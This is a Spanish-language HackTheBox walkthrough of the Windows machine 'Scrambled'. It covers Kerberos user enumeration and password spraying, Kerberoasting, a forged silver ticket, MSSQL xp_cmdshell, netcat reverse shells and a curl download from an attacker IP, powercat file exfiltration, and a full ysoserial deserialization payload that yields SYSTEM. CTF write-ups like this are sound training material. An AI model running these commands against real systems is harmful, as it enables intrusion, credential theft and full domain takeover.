Scrambled es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Media.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Scrambled 10.10.11.168 a /etc/hosts como scrambled.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
# Nmap 7.92 scan initiated Fri Aug 5 12:53:46 2022 as: nmap -sV -sC -oA enumeration/nmap1 10.10.11.168 Nmap scan report for 10.10.11.168 Host is up (0.043s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Scramble Corp Intranet 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-05 12:53:59Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) |_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=DC1.scrm.local | Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local | Not valid before: 2022-06-09T15:30:57 |_Not valid after: 2023-06-09T15:30:57 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC1.scrm.local | Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local | Not valid before: 2022-06-09T15:30:57 |_Not valid after: 2023-06-09T15:30:57 |_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2022-08-05T12:53:39 |_Not valid after: 2052-08-05T12:53:39 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) |_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=DC1.scrm.local | Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local | Not valid before: 2022-06-09T15:30:57 |_Not valid after: 2023-06-09T15:30:57 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) |_ssl-date: 2022-08-05T12:55:19+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=DC1.scrm.local | Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local | Not valid before: 2022-06-09T15:30:57 |_Not valid after: 2023-06-09T15:30:57 Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | ms-sql-info: | 10.10.11.168:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-08-05T12:54:41 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Aug 5 12:55:18 2022 -- 1 IP address (1 host up) scanned in 92.79 seconds |
Vemos varias posibilidades en este primer escaneo así que vamos a enumerar todas las posibles opciones.
Enumeración
Comenzamos revisando el portal web en el puerto 80, accedemos a través del navegador y vemos la siguiente página web
Revisamos el mismo y encontramos una página donde indican que han desactivado la autenticación por NTLM debido a una brecha de seguridad
Continuamos revisando el portal web y vemos una página donde hay información de un ejecutable que realiza la depuración de un servicio por medio del puerto 4411
Hacemos la prueba de conexión a dicho puerto y tenemos acceso
1 2 |
$ nc 10.10.11.168 4411 SCRAMBLECORP_ORDERS_V1.0.3; |
Otra cosa importante que encontramos en la página de reseteo de password, es que dicho servicio está caído por lo que hay que contactar con IT para restablecer la misma utilizando el nombre de usuario como password, lo que nos da una pista del tipo de ataque a realizar sobre kerberos.
Enumeración sobre kerberos
Visto el portal web vamos a utilizar kerbrute para realizar una enumeración de usuarios de kerberos utilizando el siguiente diccionario
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
$ kerbrute userenum -d scrm.local --dc dc1.scrm.local /data/tools/kerberos_enum_userlists/A-ZSurnames.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop 2022/08/05 13:05:28 > Using KDC(s): 2022/08/05 13:05:28 > dc1.scrm.local:88 2022/08/05 13:05:28 > [+] VALID USERNAME: ASMITH@scrm.local 2022/08/05 13:05:49 > [+] VALID USERNAME: JHALL@scrm.local 2022/08/05 13:05:51 > [+] VALID USERNAME: KSIMPSON@scrm.local 2022/08/05 13:05:52 > [+] VALID USERNAME: KHICKS@scrm.local 2022/08/05 13:06:09 > [+] VALID USERNAME: SJENKINS@scrm.local 2022/08/05 13:06:29 > Done! Tested 13000 usernames (5 valid) in 60.700 seconds |
Hemos descubierto 5 usuarios válidos, ahora vamos a tratar de conseguir la password, y para ello vamos a utilizar el nombre de usuario como password, tal y como vimos en el portal
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
$ for i in $(cat files/users.txt);do kerbrute bruteuser -d scrm.local --dc dc1.scrm.local files/passwords.txt $i;done __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop 2022/08/05 13:10:59 > Using KDC(s): 2022/08/05 13:10:59 > dc1.scrm.local:88 2022/08/05 13:10:59 > Done! Tested 5 logins (0 successes) in 0.327 seconds __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop 2022/08/05 13:10:59 > Using KDC(s): 2022/08/05 13:10:59 > dc1.scrm.local:88 2022/08/05 13:11:00 > Done! Tested 5 logins (0 successes) in 0.115 seconds __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop 2022/08/05 13:11:00 > Using KDC(s): 2022/08/05 13:11:00 > dc1.scrm.local:88 2022/08/05 13:11:00 > [+] VALID LOGIN: KSIMPSON@scrm.local:ksimpson 2022/08/05 13:11:00 > Done! Tested 5 logins (1 successes) in 0.236 seconds __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop 2022/08/05 13:11:00 > Using KDC(s): 2022/08/05 13:11:00 > dc1.scrm.local:88 2022/08/05 13:11:00 > Done! Tested 5 logins (0 successes) in 0.328 seconds __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 08/05/22 - Ronnie Flathers @ropnop 2022/08/05 13:11:00 > Using KDC(s): 2022/08/05 13:11:00 > dc1.scrm.local:88 2022/08/05 13:11:00 > Done! Tested 5 logins (0 successes) in 0.291 seconds |
Y conseguimos un usuario válido
1 |
KSIMPSON@scrm.local:ksimpson |
Obteniendo las credenciales del usuario sqlsvc
Ya tenemos un usuario, así que vamos a obtener el ticket de kerberos para poder continuar, utilizaremos para ello la herramienta getTGT de impacket
1 2 3 4 |
$ impacket-getTGT scrm.local/ksimpson:ksimpson Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Saving ticket in ksimpson.ccache |
Exportamos la variable con el fichero ccache generado
1 |
$ export KRB5CCNAME=ksimpson.ccache |
Y ahora procederemos a enumerar otros servicios.
Accedemos con la tool smbclient de impacket y descubrimos un fichero pdf muy interesante
1 2 3 4 5 6 7 8 9 10 |
$ impacket-smbclient -k scrm.local/ksimpson@dc1.scrm.local -no-pass Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation Type help for list of commands # use public # ls drw-rw-rw- 0 Thu Nov 4 22:23:19 2021 . drw-rw-rw- 0 Thu Nov 4 22:23:19 2021 .. -rw-rw-rw- 630106 Fri Nov 5 17:45:07 2021 Network Security Changes.pdf # get Network Security Changes.pdf |
En el anterior fichero nos indica que el vector de acceso fue por un usuario de base de datos así que es posible que la misma tenga privilegios importantes.
Enumeraremos usuarios con GetUserSPNs
1 2 3 4 5 6 7 8 9 10 11 |
$ impacket-GetUserSPNs -dc-ip dc1.scrm.local -no-pass scrm.local/ksimpson:ksimpson -k -request Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ---------------------------- ------ -------- -------------------------- -------------------------- ---------- MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 16:32:02.351452 2022-08-05 12:53:37.787451 MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 16:32:02.351452 2022-08-05 12:53:37.787451 $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$d48a0ffd03dd3672b496efea3a256499$ecfa8d13dca82bdb50adcb1f74ce242082fa512f55adb3e308192ed3a9ef0f5cd89c8c7d36d5a39c0d420cdba744cfbd322ea44af33e6fe80891a23bca8ebfb319589c9620c0a35e38158c2ac1108a05d78f50aa8fc69ae806fddc693ec8c718b9eb18a8403ada1858dbd314c1795d101cec308ef31413499bf681fc32e6de18e2f321cf32f29fc2f47af87ae86dfd7c31abb0385c57bde4895f48da6da50ad3b9544b9a4e1e2a5dd099946762ece9df3065831424e484e140cf4c985382887400361839098270780a2216d7afb26e287f66b2d961e6d2c9502ab4f6d75e34027520d8dda308eaea0be2bc130f5c5150acf0a696efdc17753e514d1f32dcc095f611365333cbbd16a642a2b4f7e6fee41d539d43218308f224908cc66d6a978142c47dd2b92f5015a9fd142e3186fc0d827c0897b53a342a6dcf73e4d40a32a64d576736f4bc28901ff411b5621b9aa46905602d0b290b7b3ac86cedcde9375780ee326c691684c7a9ea52e1d588efb4dcb7341293ca2274a2cd7f4a21a7c61c792531df79ae9537390da6948b4899b2f679e175b8ceddbd08090a667db006868d1018b08c58c68145c7f8d5de20eaeeb00db342e99cb139f8f893eb78aabb2917ce5890b28760ef460855a91954a4cdc5e26a49c7a917144f653d8739be5a7bc43e6a755f1f39484ec00df571ffd3247d370c784012fc4851818f9b314f03a24ae2bf2e1f40d94fadaf2e3de728b366fc440e8d6324158734d46644b438f963885b1cd690ce6108b3483e23498342666181a110241f3e82466c7b75f37603bc91802c762ea50188f22c1258f6e70cb876967d2a5f9c087c1ed6a8ae0f062662c6ce44e7e013506e1ddf052aff67261173196bec5fc27d48b6d4bc22463fbbab9cebb42523d2d4b27ed70536715e1957fbd80a0d7d761acf57c5ccd8c47ea27e6c108f0c211905504ce8be2c0cc5462d8cd36680d05ad865f37bdbdbbe40aee5db465c8a51e3c9784b0293de03a246fbce1c94fa2be75e0411b2e9f5cb9122da696689e5ee73bcac181d1a607afe14693f831bfc08b1a1ead5a76f44920b4f1099738226c4e0cbdb3a76ce10ce3ef89639641f0c2664f66bde57d7d270e4f5593fe079707336d77c6a8a442f39ea641f750bb16abfe37269da880c84763b2eac4c5c5538b366a0275027cb45c2f0eed09da219de4ff48de4748a9056f646a5b0fd7618cb2f06d7f41a9573ca933d6b4d90bb809ebf537a569cf810aa453daa91b9fc9f76b760df96ab4ea97d389134ee17cf973d7b94404ce2f8b33ea7c6bdbfa81f2cff49613a877138b1d2f7798efcd10ac58a2985e5cea43ef884eca54c2c24fffc9d03ebc0c51062c4efef81ef3d2e44034741a9f35370e9b826dbbd6f173c9dc43057965c53f6575b48a5e0962308d05ab612aa52e947b83c |
Y tenemos el hash del usuario sqlsvc, así que vamos a utilizar john para obtener la contraseña en plano
1 2 3 4 5 6 7 8 9 |
$ john -w=/usr/share/wordlists/rockyou.txt keys/sqlsvc.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Pegasus60 (?) 1g 0:00:00:13 DONE (2022-08-05 14:04) 0.07163g/s 768586p/s 768586c/s 768586C/s Peguero..Pearce Use the "--show" option to display all of the cracked passwords reliably Session completed. |
Y tenemos un usuario y contraseña
1 |
sqlsvc:Pegasus60 |
Accediendo a MSSQL
El siguiente paso será acceder con el usuario sqlsvc al servicio de MSSQL existente en la máquina y para ello vamos a necesitar previamente obtener dos cosas
- El SID de la máquina
- Convertir la password del usuario en NTLM
Conseguiremos el SID en primer lugar con la tool secretsdump
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
$ impacket-secretsdump -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket [+] Using Kerberos Cache: /tmp/ksimpson.ccache [+] SPN CIFS/DC1.SCRM.LOCAL@SCRM.LOCAL not found in cache [+] AnySPN is True, looking for another suitable SPN [+] Returning cached credential for KRBTGT/SCRM.LOCAL@SCRM.LOCAL [+] Using TGT from cache [+] Trying to connect to KDC at SCRM.LOCAL [-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [+] Session resume file will be sessionresume_WeeXgKTF [+] Trying to connect to KDC at SCRM.LOCAL [+] Calling DRSCrackNames for S-1-5-21-2743207045-1827831105-2542523200-500 [+] Calling DRSGetNCChanges for {edaf791f-e75b-4711-8232-3cd66840032a} Traceback (most recent call last): File "/usr/share/doc/python3-impacket/examples/secretsdump.py", line 230, in dump self.__NTDSHashes.dump() File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 2612, in dump userRecord = self.__remoteOps.DRSGetNCChanges( File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 580, in DRSGetNCChanges return self.__drsr.request(request) File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 880, in request raise exception impacket.dcerpc.v5.drsuapi.DCERPCSessionError: DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid. [-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid. [*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter [*] Cleaning up... |
Y convertiremos la password en NTLM con la herramienta online de codebeautify
Ahora que ya tenemos los datos necesarios, generamos un ticket del usuario Administrator
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
$ impacket-ticketer -domain scrm.local -spn MSSQLSVC/dc1.scrm.local -user-id 500 Administrator -nthash B999A16500B87D17EC7F2E2A68778F05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for scrm.local/Administrator [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncTGSRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncTGSRepPart [*] Saving ticket in Administrator.ccache |
Exportamos el fichero ccache
1 |
$ export KRB5CCNAME=Administrator.ccache |
Y conectamos a la ddbb utilizando dicho ticket
1 2 3 4 5 6 7 8 9 10 11 12 |
$ impacket-mssqlclient dc1.scrm.local -k -no-pass Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC1): Line 1: Changed database context to 'master'. [*] INFO(DC1): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL> |
Explotando MSSQL
Ahora que ya estamos dentro del MSSQL, vamos a enumerar los esquemas existentes
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
SQL> SELECT name FROM master.dbo.sysdatabases name -------------------------------------------------------------------------------------------------------------------------------- master tempdb model msdb ScrambleHR |
Obtendremos las tablas del esquema ScrambleHR
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
SQL> use ScrambleHR [*] ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR [*] INFO(DC1): Line 1: Changed database context to 'ScrambleHR'. SQL> SELECT * FROM ScrambleHR.INFORMATION_SCHEMA.TABLES; TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------------------- ---------- ScrambleHR dbo Employees b'BASE TABLE' ScrambleHR dbo UserImport b'BASE TABLE' ScrambleHR dbo Timesheets b'BASE TABLE' SQL> |
Y obtenemos el contenido de la tabla UserImport
1 2 3 4 5 6 7 8 |
SQL> SELECT * FROM UserImport; LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups -------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------- ------------- MiscSvc ScrambledEggs9900 scrm.local 90 0 SQL> |
En la cual encontramos las credenciales del usuario MiscSvc
1 |
MiscSvc:ScrambledEggs9900 |
Visto el contenido del fichero pdf, utilizaremos xp_cmdshell para intentar ejecutar comandos en la maquina
1 2 3 4 5 6 7 8 9 10 11 12 13 |
SQL> enable_xp_cmdshell [*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> xp_cmdshell whoami output -------------------------------------------------------------------------------- scrm\sqlsvc NULL SQL> |
Así que vamos a descargarnos netcat para obtener una shell en condiciones
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
SQL> xp_cmdshell curl http://10.10.14.4:8000/nc64.exe -o C:\Temp\nc64.exe output -------------------------------------------------------------------------------- % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 45272 100 45272 0 0 239k 0 --:--:-- --:--:-- --:--:-- 238k NULL SQL> xp_cmdshell dir C:\Temp\ output -------------------------------------------------------------------------------- Volume in drive C has no label. Volume Serial Number is 5805-B4B6 NULL Directory of C:\Temp NULL 05/08/2022 15:20 <DIR> . 05/08/2022 15:20 <DIR> .. 05/08/2022 15:21 45,272 nc64.exe 1 File(s) 45,272 bytes 2 Dir(s) 15,997,759,488 bytes free NULL SQL> xp_cmdshell C:\Temp\nc64.exe -e powershell 10.10.14.4 4444 |
Y conseguimos acceso en nuestra escucha
1 2 3 4 5 6 7 8 9 |
$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.10.14.4] from scrambled.htb [10.10.11.168] 64803 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami scrm\sqlsvc |
Escalando al usuario MiscSvc
Vamos a utilizar las credenciales vistas anteriormente para escalar al usuario MiscSvc, generaremos en primer lugar las variables y posteriormente las invocaremos para ejecutar comandos como dicho usuario
1 2 3 4 5 6 7 |
PS C:\users> $password = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force $password = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force PS C:\users> $credentials = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $password) $credentials = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $password) PS C:\users> Invoke-Command -Computer dc1 -Credential $credentials -Command { whoami } Invoke-Command -Computer dc1 -Credential $credentials -Command { whoami } scrm\miscsvc |
Así que utilizamos netcat de nuevo para obtener otra revshell
1 2 |
PS C:\users> Invoke-Command -Computer dc1 -Credential $credentials -Command {c:\temp\nc64.exe -e powershell 10.10.14.4 4445} Invoke-Command -Computer dc1 -Credential $credentials -Command {c:\temp\nc64.exe -e powershell 10.10.14.4 4445} |
Y estamos dentro con el usuario miscsvc
1 2 3 4 5 6 7 8 9 |
$ nc -lvp 4445 listening on [any] 4445 ... connect to [10.10.14.4] from scrambled.htb [10.10.11.168] 64828 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\miscsvc\Documents> whoami whoami scrm\miscsvc |
Obteniendo la flag de user
Una vez dentro con el usuario, nos vamos a su escritorio para obtener la primera flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
PS C:\Users\miscsvc\Documents> cd ..\desktop cd ..\desktop PS C:\Users\miscsvc\desktop> dir dir Directory: C:\Users\miscsvc\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 05/08/2022 13:52 34 user.txt PS C:\Users\miscsvc\desktop> type user.txt type user.txt 1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0 PS C:\Users\miscsvc\desktop> |
Escalado de privilegios
Buscaremos a continuación la aplicación que se menciona en la página web y encontramos un fichero .exe y un fichero .dll
1 2 3 4 5 6 7 8 9 10 11 |
PS C:\shares\it\apps\Sales Order Client> dir dir Directory: C:\shares\it\apps\Sales Order Client Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 05/11/2021 20:52 86528 ScrambleClient.exe -a---- 05/11/2021 20:52 19456 ScrambleLib.dll |
Para descargarnos los mismos tenemos dos opciones, copiarlos a la carpeta Public en C:\Shares\Public y descargarlos por smb como hicimos con el fichero pdf o utilizar la tool powercat
Utilizamos la herramienta en nuestro caso de la siguiente forma
1 2 3 4 |
PS C:\shares\it\apps\Sales Order Client> powercat -c 10.10.14.4 -p 5555 -i "C:\shares\it\apps\Sales Order Client\ScrambleClient.exe" powercat -c 10.10.14.4 -p 5555 -i "C:\shares\it\apps\Sales Order Client\ScrambleClient.exe" PS C:\shares\it\apps\Sales Order Client> powercat -c 10.10.14.4 -p 5555 -i "C:\shares\it\apps\Sales Order Client\ScrambleLib.dll" powercat -c 10.10.14.4 -p 5555 -i "C:\shares\it\apps\Sales Order Client\ScrambleLib.dll" |
Ahora para analizar los ficheros utilizaremos la herramienta dnspy y encontramos una vulnerabilidad de deserialización en la función UploadOrder
Así que vamos a generar nuestro payload, y para ello utilizaremos la herramienta ysoserial
1 |
.\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "C:\Temp\nc64.exe -e powershell 10.10.14.4 4447" |
Y lanzaremos nuestro payload a través del puerto 4411 que vimos al principio
1 2 3 4 |
$ nc 10.10.11.168 4411 SCRAMBLECORP_ORDERS_V1.0.3; UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA+AlBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBM0FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0T0NJL1BnMEtQRTlpYW1WamRFUmhkR0ZRY205MmFXUmxjaUJOWlhSb2IyUk9ZVzFsUFNKVGRHRnlkQ0lnU1hOSmJtbDBhV0ZzVEc5aFpFVnVZV0pzWldROUlrWmhiSE5sSWlCNGJXeHVjejBpYUhSMGNEb3ZMM05qYUdWdFlYTXViV2xqY205emIyWjBMbU52YlM5M2FXNW1lQzh5TURBMkwzaGhiV3d2Y0hKbGMyVnVkR0YwYVc5dUlpQjRiV3h1Y3pwelpEMGlZMnh5TFc1aGJXVnpjR0ZqWlRwVGVYTjBaVzB1UkdsaFoyNXZjM1JwWTNNN1lYTnpaVzFpYkhrOVUzbHpkR1Z0SWlCNGJXeHVjenA0UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkNJK0RRb2dJRHhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VDJKcVpXTjBTVzV6ZEdGdVkyVStEUW9nSUNBZ1BITmtPbEJ5YjJObGMzTStEUW9nSUNBZ0lDQThjMlE2VUhKdlkyVnpjeTVUZEdGeWRFbHVabTgrRFFvZ0lDQWdJQ0FnSUR4elpEcFFjbTlqWlhOelUzUmhjblJKYm1adklFRnlaM1Z0Wlc1MGN6MGlMMk1nUXpwY1ZHVnRjRnh1WXpZMExtVjRaU0F0WlNCd2IzZGxjbk5vWld4c0lERXdMakV3TGpFMExqUWdORFEwTnlJZ1UzUmhibVJoY21SRmNuSnZja1Z1WTI5a2FXNW5QU0o3ZURwT2RXeHNmU0lnVTNSaGJtUmhjbVJQZFhSd2RYUkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRlZ6WlhKT1lXMWxQU0lpSUZCaGMzTjNiM0prUFNKN2VEcE9kV3hzZlNJZ1JHOXRZV2x1UFNJaUlFeHZZV1JWYzJWeVVISnZabWxzWlQwaVJtRnNjMlVpSUVacGJHVk9ZVzFsUFNKamJXUWlJQzgrRFFvZ0lDQWdJQ0E4TDNOa09sQnliMk5sYzNNdVUzUmhjblJKYm1adlBnMEtJQ0FnSUR3dmMyUTZVSEp2WTJWemN6NE5DaUFnUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvOEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation. |
Y obtendremos en nuestra escucha acceso como system
1 2 3 4 5 6 7 8 9 |
$ nc -lvp 4447 listening on [any] 4447 ... connect to [10.10.14.4] from scrambled.htb [10.10.11.168] 49882 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> whoami whoami nt authority\system |
Obteniendo la flag de root
Y como último paso nos queda ir a leer la flag del escritorio del usuario Administrator
1 2 3 4 |
PS C:\Windows\system32> type c:\users\administrator\desktop\root.txt type c:\users\administrator\desktop\root.txt 4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxd PS C:\Windows\system32> |
Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.
Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace